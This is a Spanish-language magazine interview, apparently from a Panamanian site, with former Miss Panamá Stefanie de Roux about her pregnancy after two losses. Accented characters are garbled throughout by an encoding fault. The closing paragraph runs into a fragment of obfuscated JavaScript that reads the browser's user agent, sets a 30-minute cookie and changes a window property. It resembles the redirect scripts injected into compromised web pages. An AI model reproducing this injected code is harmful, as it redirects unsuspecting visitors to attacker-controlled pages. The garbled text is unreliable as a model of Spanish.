Luego de anunciar su embarazo en Instagram, la presentadora del programa Red Carpet y Miss PanamA? 2003, Stefanie de Roux, revela que sufriA? dos pA�rdidas antes de esta buena noticia. SerA? un niA�o, el primero para De Roux y su esposo, el arquitecto JosA� Luis Urrutia, y nacerA? en cuatro meses. Asegura que estA? lista para que le cambie la vida.

A?CuA?l fue tu reacciA?n al recibir la noticia?
Te soy sincera, al principio mi esposo y yo no le dimos tanta importancia porque ya habA�amos pasado por dos pA�rdidas y no querA�amos entusiasmarnos hasta que estuviA�ramos seguros de que todo estaba bajo control. Ahora que ya estamos seguros de que el embarazo marcha bien, el panorama es distinto.

Consejo de mamA?.
Nosotros tenemos un perro en casa y le brindamos mucho cariA�o. Entonces, mi mamA? me dice a�?si asA� quieres a tu perro, ahora imagA�nate cuando tengas a tu hijo en brazos, ese es un amor que va mA?s allA? porque es un ser que nace de tia�?.

A?Ya cambiA? en algo tu rutina?
Sigo mi rutina diaria normal. No he hecho nada diferente a lo acostumbrado desde que me embaracA�. Hago ejercicios todos los dA�as, como las comidas de siempre (llevo una dieta balanceada). AdemA?s de que este embarazo no me ha provocado ningA?n malestar de los que muchas mujeres se quejan, con decirte que ni sueA�o me ha dado.

A?Y tu esposo?
A�l estA? muy contento al igual que yo, es nuestro primer hijo. Se preocupa mucho por mA�, y me doy cuenta porque, como yo no siento ningA?n malestar, A�l estA? pendiente de acordarme de que tengo que bajar las revoluciones. A veces lo ves buscando en internet temas relacionados para poder entender e instruirse de cA?mo es todo el tema del embarazo y cA?mo ser padres primerizos.

Luego de las pA�rdidas, A?seguiste algA?n tratamiento de fertilidad?
No. Yo tratamiento no me querA�a hacer luego de las dos pA�rdidas y el doctor me dijo que no era necesario hacerlo. Solo habA�a que tener mucha paciencia y disfrutar el matrimonio. Lo que pasa es que para nosotros el embarazo no era el centro principal de vida como casados, asA� como suele suceder en otros matrimonios que sA� centran su vida en los hijos. Para nosotros era como decir a�?si pasa bien y si no pasa, Dios sabrA? cuA?ndo es el momentoa��.

A?CuA?ndo llegarA??
A mediados de marzo, si Dios quiere.

A?Parto natural o cesA?rea?
De momento, parto natural.

A?Tienen planes para ajustarse a la vida de papA?s?
En estos momentos solo me estoy concentrando en llevar un embarazo sano, que el bebA� nazca bien. Luego de eso, mi esposo y yo hemos decidido que el bebA� debe incorporarse a nuestra vida e incluirlo en nuestras actividades diarias. te\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}